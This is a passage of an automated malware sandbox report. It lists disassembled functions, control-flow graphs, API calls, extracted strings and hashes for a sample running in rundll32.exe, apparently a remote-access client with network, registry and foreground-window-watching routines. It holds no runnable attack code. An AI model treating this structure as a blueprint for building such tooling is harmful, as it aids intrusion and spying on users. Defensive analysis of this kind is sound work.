                                      • Opcode Fuzzy Hash: cbc21988a16f2a90c83429a1e458b5e0c3bb7890280cbe0cb4b0a060ba579c6b
                                      • Instruction Fuzzy Hash: FE321C61B543402FEA2FB7789CE5B3E2E9B8F81780F8408DDF5465B2D0EE988D458B51
                                      Function 02B14F2A Relevance: 32.3, APIs: 5, Strings: 13, Instructions: 809sleepnetworkCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 448 2b14f2a-2b14f72 call 2b020df call 2b1b8b3 call 2b020df call 2b01e65 call 2b01fab call 2b3baac 461 2b14f81-2b14fcd call 2b02093 call 2b01e65 call 2b020f6 call 2b1be1b call 2b0489e call 2b01e65 call 2b0b9bd 448->461 462 2b14f74-2b14f7b Sleep 448->462 477 2b15041-2b150dc call 2b02093 call 2b01e65 call 2b020f6 call 2b1be1b call 2b01e65 * 2 call 2b06c1e call 2b02f10 call 2b01fe2 call 2b01fd8 * 2 call 2b01e65 call 2b05b05 461->477 478 2b14fcf-2b1503e call 2b01e65 call 2b0247c call 2b01e65 call 2b01fab call 2b01e65 call 2b0247c call 2b01e65 call 2b01fab call 2b01e65 call 2b0247c call 2b01e65 call 2b01fab call 2b0473d 461->478 462->461 531 2b150ec-2b150f3 477->531 532 2b150de-2b150ea 477->532 478->477 533 2b150f8-2b1518a call 2b05aa6 call 2b0531e call 2b06383 call 2b02f10 call 2b02093 call 2b1b4ef call 2b01fd8 * 2 call 2b01e65 call 2b01fab call 2b01e65 call 2b01fab call 2b14ee9 531->533 532->533 560 2b151d5-2b151e3 call 2b0482d 533->560 561 2b1518c-2b151d0 WSAGetLastError call 2b1cae1 call 2b052fd call 2b02093 call 2b1b4ef call 2b01fd8 533->561 566 2b15210-2b15225 call 2b04f51 call 2b048c8 560->566 567 2b151e5-2b1520b call 2b02093 * 2 call 2b1b4ef 560->567 582 2b15aa3-2b15ab5 call 2b04e26 call 2b021fa 561->582 566->582 583 2b1522b-2b1537e call 2b01e65 * 2 call 2b0531e call 2b06383 call 2b02f10 call 2b06383 call 2b02f10 call 2b02093 call 2b1b4ef call 2b01fd8 * 4 call 2b1b7e0 call 2b145bd call 2b0905c call 2b41e81 call 2b01e65 call 2b020f6 call 2b0247c call 2b01fab * 2 call 2b136f8 566->583 567->582 596 2b15ab7-2b15ad7 call 2b01e65 call 2b01fab call 2b3baac Sleep 582->596 597 2b15add-2b15ae5 call 2b01e8d 582->597 648 2b15380-2b1538d call 2b05aa6 583->648 649 2b15392-2b153b9 call 2b01fab call 2b135a6 583->649 596->597 597->477 648->649 655 2b153c0-2b15a0a call 2b0417e call 2b0dd89 call 2b1bc42 call 2b1bd1e call 2b1bb8e call 2b01e65 GetTickCount call 2b1bb8e call 2b1bae6 call 2b1bb8e * 2 call 2b1ba96 call 2b1bd1e * 5 call 2b0f8d1 call 2b1bd1e call 2b02f31 call 2b02ea1 call 2b02f10 call 2b02ea1 call 2b02f10 * 3 call 2b02ea1 call 2b02f10 call 2b06383 call 2b02f10 call 2b06383 call 2b02f10 call 2b02ea1 call 2b02f10 call 2b02ea1 call 2b02f10 call 2b02ea1 call 2b02f10 call 2b02ea1 call 2b02f10 call 2b02ea1 call 2b02f10 call 2b02ea1 call 2b02f10 call 2b02ea1 call 2b02f10 call 2b06383 call 2b02f10 * 5 call 2b02ea1 call 2b02f10 call 2b02ea1 call 2b02f10 * 7 call 2b02ea1 call 2b04aa1 call 2b01fd8 * 50 call 2b01f09 call 2b01fd8 * 6 call 2b01f09 call 2b04c10 649->655 656 2b153bb-2b153bd 649->656 901 2b15a0f-2b15a16 655->901 656->655 902 2b15a18-2b15a1f 901->902 903 2b15a2a-2b15a31 901->903 902->903 904 2b15a21-2b15a23 902->904 905 2b15a33-2b15a38 call 2b0b051 903->905 906 2b15a3d-2b15a6f call 2b05a6b call 2b02093 * 2 call 2b1b4ef 903->906 904->903 905->906 917 2b15a71-2b15a7d CreateThread 906->917 918 2b15a83-2b15a9e call 2b01fd8 * 2 call 2b01f09 906->918 917->918 918->582
                                      APIs
                                      • Sleep.KERNEL32(00000000,00000029,02B752F0,02B750E4,00000000), ref: 02B14F7B
                                      • WSAGetLastError.WS2_32(00000000,00000001), ref: 02B1518C
                                      • Sleep.KERNEL32(00000000,00000002), ref: 02B15AD7
                                        • Part of subcall function 02B1B4EF: GetLocalTime.KERNEL32(00000000), ref: 02B1B509
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep$ErrorLastLocalTime
                                      • String ID: | $%I64u$4.9.4 Pro$C:\Windows\SysWOW64\rundll32.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$TLS Off$TLS On $hlight$name
                                      • API String ID: 524882891-3655911104
                                      • Opcode ID: efb75d531ea32555b48b4a0704867105a82e0986498e5ab5bf1d4d055261f263
                                      • Instruction ID: 998dcaa2c2815a35fece84284c9f0c87fbd708cbea5b29e445dd512e859f8401
                                      • Opcode Fuzzy Hash: efb75d531ea32555b48b4a0704867105a82e0986498e5ab5bf1d4d055261f263
                                      • Instruction Fuzzy Hash: B6525931A101149ADB2AF735DCD5AFEBB779F50340FA045E9E80AA71E4EF301E898E54
                                      Function 02B048C8 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 144networkCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • connect.WS2_32(?,?,?), ref: 02B048E0
                                      • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 02B04A00
                                      • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 02B04A0E
                                      • WSAGetLastError.WS2_32 ref: 02B04A21
                                        • Part of subcall function 02B1B4EF: GetLocalTime.KERNEL32(00000000), ref: 02B1B509
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                      • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                      • API String ID: 994465650-2151626615
                                      • Opcode ID: aeda717f37339d63dc51357f18a800f3eb8e07d1144749d66a90c36227380243
                                      • Instruction ID: 8c70f2335eb8a3c8a1a37815d4b6bd2c9eeb3d249795789466886c561dd48aaa
                                      • Opcode Fuzzy Hash: aeda717f37339d63dc51357f18a800f3eb8e07d1144749d66a90c36227380243
                                      • Instruction Fuzzy Hash: D5411765B403016FA6257B7A889F83D7F27EB51340B8441E8E90207AD5EF11A928CFE3
                                      Function 02B04E26 Relevance: 18.1, APIs: 12, Instructions: 65synchronizationCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,02B051C0,?,?,?,02B05159), ref: 02B04E38
                                      • SetEvent.KERNEL32(?,?,?,?,00000000,?,02B051C0,?,?,?,02B05159), ref: 02B04E43
                                      • CloseHandle.KERNEL32(?,?,?,?,00000000,?,02B051C0,?,?,?,02B05159), ref: 02B04E4C
                                      • closesocket.WS2_32(000000FF), ref: 02B04E5A
                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,02B051C0,?,?,?,02B05159), ref: 02B04E91
                                      • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 02B04EA2
                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02B04EA9
                                      • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02B04EBA
                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02B04EBF
                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02B04EC4
                                      • SetEvent.KERNEL32(?,?,?,?,00000000,?,02B051C0,?,?,?,02B05159), ref: 02B04ED1
                                      • CloseHandle.KERNEL32(?,?,?,?,00000000,?,02B051C0,?,?,?,02B05159), ref: 02B04ED6
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                      • String ID:
                                      • API String ID: 3658366068-0
                                      • Opcode ID: dee333805a4cb1c487455911ea7a1c86214dbe34871d01c1675db97580e01240
                                      • Instruction ID: 4a63e44ca14d300e6f7eb978c52100ab9a11dc2aa1abc4f057749172dedb3b53
                                      • Opcode Fuzzy Hash: dee333805a4cb1c487455911ea7a1c86214dbe34871d01c1675db97580e01240
                                      • Instruction Fuzzy Hash: 45211A31440B149FDB366B25DC49B27BBA2FF40366F104E59E2E606AF0CB62B861DB54
                                      Function 02B0DA34 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 02B0DB9A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LongNamePath
                                      • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                      • API String ID: 82841172-425784914
                                      • Opcode ID: 1f10bec832a2db538cf5f0e82cd5b04e35c20a808837caa9ef73f48cc0a666a3
                                      • Instruction ID: 4d2bd62e531390ca1b1d841f72811849589c0a1b4c81befc4a1599bbbd47122d
                                      • Opcode Fuzzy Hash: 1f10bec832a2db538cf5f0e82cd5b04e35c20a808837caa9ef73f48cc0a666a3
                                      • Instruction Fuzzy Hash: 034140311182019BE21BFB64DCD48BEBFEAEF91754F0045EEB546920E1FF609A49CE52
                                      Function 02B1B2C3 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1099 2b1b2c3-2b1b31a call 2b1bfb7 call 2b135a6 call 2b01fe2 call 2b01fd8 call 2b06ae1 1110 2b1b35d-2b1b366 1099->1110 1111 2b1b31c-2b1b32b call 2b135a6 1099->1111 1112 2b1b368-2b1b36d 1110->1112 1113 2b1b36f 1110->1113 1115 2b1b330-2b1b347 call 2b01fab StrToIntA 1111->1115 1116 2b1b374-2b1b37f call 2b0537d 1112->1116 1113->1116 1121 2b1b355-2b1b358 call 2b01fd8 1115->1121 1122 2b1b349-2b1b352 call 2b1cf69 1115->1122 1121->1110 1122->1121
                                      APIs
                                        • Part of subcall function 02B1BFB7: GetCurrentProcess.KERNEL32(?,?,?,02B0DAAA,WinDir,00000000,00000000), ref: 02B1BFC8
                                        • Part of subcall function 02B135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 02B135CA
                                        • Part of subcall function 02B135A6: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 02B135E7
                                        • Part of subcall function 02B135A6: RegCloseKey.KERNEL32(?), ref: 02B135F2
                                      • StrToIntA.SHLWAPI(00000000,02B6C9F8,00000000,00000000,00000000,02B750E4,00000003,Exe,00000000,0000000E,00000000,02B660BC,00000003,00000000), ref: 02B1B33C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCurrentOpenProcessQueryValue
                                      • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                      • API String ID: 1866151309-2070987746
                                      • Opcode ID: de9d76c8c69725bcc1877337b9608a545a4834bcad9e2212fb849a68021382c6
                                      • Instruction ID: a9814bf3e281807d70789b2dd8ae1fa5d6c11054abb33f1410505ca0dc4f4308
                                      • Opcode Fuzzy Hash: de9d76c8c69725bcc1877337b9608a545a4834bcad9e2212fb849a68021382c6
                                      • Instruction Fuzzy Hash: EC11C820A4020026E309B378DC8EF7F7F6F8B90300FC401E6E91BA30D1EB5848568BA1
                                      Function 02B43435 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1173 2b43435-2b43442 1174 2b43444-2b43448 1173->1174 1175 2b43460-2b43489 call 2b4f059 GetModuleFileNameA 1173->1175 1174->1175 1176 2b4344a-2b4345b call 2b405dd call 2b3bcec 1174->1176 1180 2b43490 1175->1180 1181 2b4348b-2b4348e 1175->1181 1188 2b43554-2b43558 1176->1188 1183 2b43492-2b434bc call 2b43559 call 2b436ce 1180->1183 1181->1180 1181->1183 1191 2b434be-2b434c8 call 2b405dd 1183->1191 1192 2b434ca-2b434e7 call 2b43559 1183->1192 1197 2b434fb-2b434fd 1191->1197 1198 2b434ff-2b43512 call 2b4eb74 1192->1198 1199 2b434e9-2b434f6 1192->1199 1201 2b43549-2b43553 call 2b46782 1197->1201 1204 2b43514-2b43517 1198->1204 1205 2b43519-2b43522 1198->1205 1199->1197 1201->1188 1207 2b4353f-2b43546 call 2b46782 1204->1207 1208 2b43524-2b4352a 1205->1208 1209 2b4352c-2b43539 1205->1209 1207->1201 1208->1208 1208->1209 1209->1207
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\rundll32.exe,00000104), ref: 02B43475
                                      • _free.LIBCMT ref: 02B43540
                                      • _free.LIBCMT ref: 02B4354A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$FileModuleName
                                      • String ID: C:\Windows\SysWOW64\rundll32.exe
                                      • API String ID: 2506810119-2837366778
                                      • Opcode ID: 07ca20d8c52951ea72252b4d38f189ad115c999fcb481ab79db3b010647f5374
                                      • Instruction ID: 45c03013b2575244b06867afc339699f660fc6f8d516e0c1d6c18e9fae7dc465
                                      • Opcode Fuzzy Hash: 07ca20d8c52951ea72252b4d38f189ad115c999fcb481ab79db3b010647f5374
                                      • Instruction Fuzzy Hash: 7B316471A00258AFDB22DF9998C4D9EBBFDEF85314F2840D6E90497201DB709A45DB90
                                      Function 02B1376F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1229 2b1376f-2b13786 RegCreateKeyA 1230 2b13788-2b137bd call 2b0247c call 2b01fab RegSetValueExA RegCloseKey 1229->1230 1231 2b137bf 1229->1231 1233 2b137c1-2b137cf call 2b01fd8 1230->1233 1231->1233
                                      APIs
                                      • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 02B1377E
                                      • RegSetValueExA.KERNEL32(?,02B674B8,00000000,?,00000000,00000000,02B752F0,?,?,02B0F853,02B674B8,4.9.4 Pro), ref: 02B137A6
                                      • RegCloseKey.KERNEL32(?,?,?,02B0F853,02B674B8,4.9.4 Pro), ref: 02B137B1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCreateValue
                                      • String ID: pth_unenc
                                      • API String ID: 1818849710-4028850238
                                      • Opcode ID: dbd3f6a06002d8c22723201101a8ffc6a5fb1d0bf1dab8fd33f07338c3fbbdc6
                                      • Instruction ID: 8af4487b6b87f8dbf81c67d87824ea47c665cd6a906756c5c029b7e2d3504e83
                                      • Opcode Fuzzy Hash: dbd3f6a06002d8c22723201101a8ffc6a5fb1d0bf1dab8fd33f07338c3fbbdc6
                                      • Instruction Fuzzy Hash: 4BF06D72840218FBCB01AFA0EC85EEE3B6DEF04790F148995FD09AA050EB319E14DB90
                                      Function 02B04AA1 Relevance: 4.6, APIs: 3, Instructions: 93synchronizationnetworkCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • send.WS2_32(?,00000000,00000000,00000000), ref: 02B04B36
                                      • WaitForSingleObject.KERNEL32(?,00000000,02B0547D,?,?,00000004,?,?,00000004,?,02B74EF8,?), ref: 02B04B47
                                      • SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,02B74EF8,?,?,?,?,?,?,02B0547D), ref: 02B04B75
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: EventObjectSingleWaitsend
                                      • String ID:
                                      • API String ID: 3963590051-0
                                      • Opcode ID: a1ba01c36c396815851a8b22699fff45c7793ac2059c3f801d502867bd85c999
                                      • Instruction ID: 075ac1af293d634799f55a8b23b83b6c2310230e7adbb9ba12d071a27ebd2730
                                      • Opcode Fuzzy Hash: a1ba01c36c396815851a8b22699fff45c7793ac2059c3f801d502867bd85c999
                                      • Instruction Fuzzy Hash: A7214572900119ABCB16ABA4DCC4DEE7B3DBF18350B044555E516A31D0EF35AA18CBA0
                                      Function 02B135A6 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1275 2b135a6-2b135d2 RegOpenKeyExA 1276 2b135d4-2b135fc RegQueryValueExA RegCloseKey 1275->1276 1277 2b13607 1275->1277 1278 2b13609 1276->1278 1279 2b135fe-2b13605 1276->1279 1277->1278 1280 2b1360e-2b1361a call 2b02093 1278->1280 1279->1280
                                      APIs
                                      • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 02B135CA
                                      • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 02B135E7
                                      • RegCloseKey.KERNEL32(?), ref: 02B135F2
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseOpenQueryValue
                                      • String ID:
                                      • API String ID: 3677997916-0
                                      • Opcode ID: 87b0e080284e9f31ead4a833bba09f0941481dd910d1752fc3de0ca9f2573d1a
                                      • Instruction ID: e6854096869305dbf7438823d01b382bdc6a06190184ad88281bea904beffff9
                                      • Opcode Fuzzy Hash: 87b0e080284e9f31ead4a833bba09f0941481dd910d1752fc3de0ca9f2573d1a
                                      • Instruction Fuzzy Hash: 6C01A276900228BBCB209B91DC49EEE7FBDDF84250F0004E5BA09E3200EA348A15DBE0
                                      Function 02B136F8 Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1283 2b136f8-2b1371c RegOpenKeyExA 1284 2b13768 1283->1284 1285 2b1371e-2b13740 RegQueryValueExA RegCloseKey 1283->1285 1287 2b1376a-2b1376e 1284->1287 1285->1284 1286 2b13742-2b13766 call 2b06cb7 call 2b06d3c 1285->1286 1286->1287
                                      APIs
                                      • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,02B752F0), ref: 02B13714
                                      • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 02B1372D
                                      • RegCloseKey.KERNEL32(00000000), ref: 02B13738
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseOpenQueryValue
                                      • String ID:
                                      • API String ID: 3677997916-0
                                      • Opcode ID: 2e814837b038403472347f2121085bdb75dd1a379a4f5e91bd7714f601bc6f64
                                      • Instruction ID: aea2a08e05c2c1098f191f3179fd3357a737fe272d8240bb36d22d0fc0d8fe7f
                                      • Opcode Fuzzy Hash: 2e814837b038403472347f2121085bdb75dd1a379a4f5e91bd7714f601bc6f64
                                      • Instruction Fuzzy Hash: 9801FBB5840229FBDF216FA1DC44EEA7F79EF05750F004594BE0866150E73189B5DBE0
                                      Function 02B13549 Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1292 2b13549-2b13571 RegOpenKeyExA 1293 2b135a0 1292->1293 1294 2b13573-2b1359e RegQueryValueExA RegCloseKey 1292->1294 1295 2b135a2-2b135a5 1293->1295 1294->1295
                                      APIs
                                      • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 02B13569
                                      • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,02B752F0), ref: 02B13587
                                      • RegCloseKey.KERNEL32(?), ref: 02B13592
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseOpenQueryValue
                                      • String ID:
                                      • API String ID: 3677997916-0
                                      • Opcode ID: cfca8d0086eb8f709042a5cc56637ea5522400c093d35ee65fed8c495a490bfe
                                      • Instruction ID: 0da7fab96708ac1face2ee8c2502d90f3d2a5a3416028e0bf8ff535e200eef64
                                      • Opcode Fuzzy Hash: cfca8d0086eb8f709042a5cc56637ea5522400c093d35ee65fed8c495a490bfe
                                      • Instruction Fuzzy Hash: 4CF01D76D40218FFDF109FA0DC05FEE7BBCEF04B50F144495BA05EA141E2355A14AB90
                                      Function 02B134FF Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,02B0C19C,02B66C48), ref: 02B13516
                                      • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,02B0C19C,02B66C48), ref: 02B1352A
                                      • RegCloseKey.KERNEL32(?,?,?,02B0C19C,02B66C48), ref: 02B13535
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseOpenQueryValue
                                      • String ID:
                                      • API String ID: 3677997916-0
                                      • Opcode ID: 99c98c2d07f67832fd5a17ab48c67eaaf1875fc738c546ffd100c65fd0b61406
                                      • Instruction ID: a056a7a9f9933699bc3c3bc67f9843b2b9db082840c3772babeeda1eb6f947f1
                                      • Opcode Fuzzy Hash: 99c98c2d07f67832fd5a17ab48c67eaaf1875fc738c546ffd100c65fd0b61406
                                      • Instruction Fuzzy Hash: E1E06531841238FBDF205BA29C0DEEB7FACDF06AE0B040584BD0DA6101E2254E10D6E0
                                      Function 02B13877 Relevance: 4.5, APIs: 3, Instructions: 30registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegCreateKeyA.ADVAPI32(80000001,00000000,02B660A4), ref: 02B13885
                                      • RegSetValueExA.KERNEL32(02B660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,02B0C152,02B66C48,00000001,000000AF,02B660A4), ref: 02B138A0
                                      • RegCloseKey.KERNEL32(02B660A4,?,?,?,02B0C152,02B66C48,00000001,000000AF,02B660A4), ref: 02B138AB
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCreateValue
                                      • String ID:
                                      • API String ID: 1818849710-0
                                      • Opcode ID: a54b69433ea0449045147852a5f90e78039288ff0b640f553ee88ce6d5fa9f10
                                      • Instruction ID: 342bb628386ffbce47f33527fe81237cc2ee28ec96a2cc298f36fefe86acf964
                                      • Opcode Fuzzy Hash: a54b69433ea0449045147852a5f90e78039288ff0b640f553ee88ce6d5fa9f10
                                      • Instruction Fuzzy Hash: 80E03072940318FBEF115F909C05FEA7B6CDF04690F044594BF09AA140D3359A1497D0
                                      Function 02B1B7B6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON
                                      Download Yara Rule
                                      APIs
                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 02B1B7CA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: GlobalMemoryStatus
                                      • String ID: @
                                      • API String ID: 1890195054-2766056989
                                      • Opcode ID: bbcecb299d33646e905c6b94cb765be3f713ce2977c7e55a176d99520e595df0
                                      • Instruction ID: fa47c3e7be16dfeff8431e9690db95ebff44d3610c6379f1c92ccd333864063e
                                      • Opcode Fuzzy Hash: bbcecb299d33646e905c6b94cb765be3f713ce2977c7e55a176d99520e595df0
                                      • Instruction Fuzzy Hash: 4AD017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8148B84
                                      Function 02B0482D Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • socket.WS2_32(?,00000001,00000006), ref: 02B04852
                                      • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,02B0530B,?,?,00000000,00000000,?,?,00000000,02B05208,?,00000000), ref: 02B0488E
                                        • Part of subcall function 02B0489E: WSAStartup.WS2_32(00000202,00000000), ref: 02B048B3
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateEventStartupsocket
                                      • String ID:
                                      • API String ID: 1953588214-0
                                      • Opcode ID: 034ca545537b63cb2c955060ab9b9166f1cc11f944dff2a491818d99c370c58a
                                      • Instruction ID: afd30fe76d2aa122415bfb3ddbe737621285e5c42f4cb3b0451ab81cb2d32b30
                                      • Opcode Fuzzy Hash: 034ca545537b63cb2c955060ab9b9166f1cc11f944dff2a491818d99c370c58a
                                      • Instruction Fuzzy Hash: 2601BC70848BD08EE7358F38A4853867FE0AB05304F044D9EF5D687B80D3B1A445CF14
                                      Function 02B0165E Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                                      • Instruction ID: 5a1034231f6e103de59520e5a86746646ee13c4770a04973c563891c300cc604
                                      • Opcode Fuzzy Hash: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                                      • Instruction Fuzzy Hash: 1EF0E2B06252016ADB1E8B7CCCA0B2A3A969B84325F58CBEDF01EC60D0CB30C890CB04
                                      Function 02B1BA96 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetForegroundWindow.USER32 ref: 02B1BAB8
                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 02B1BACB
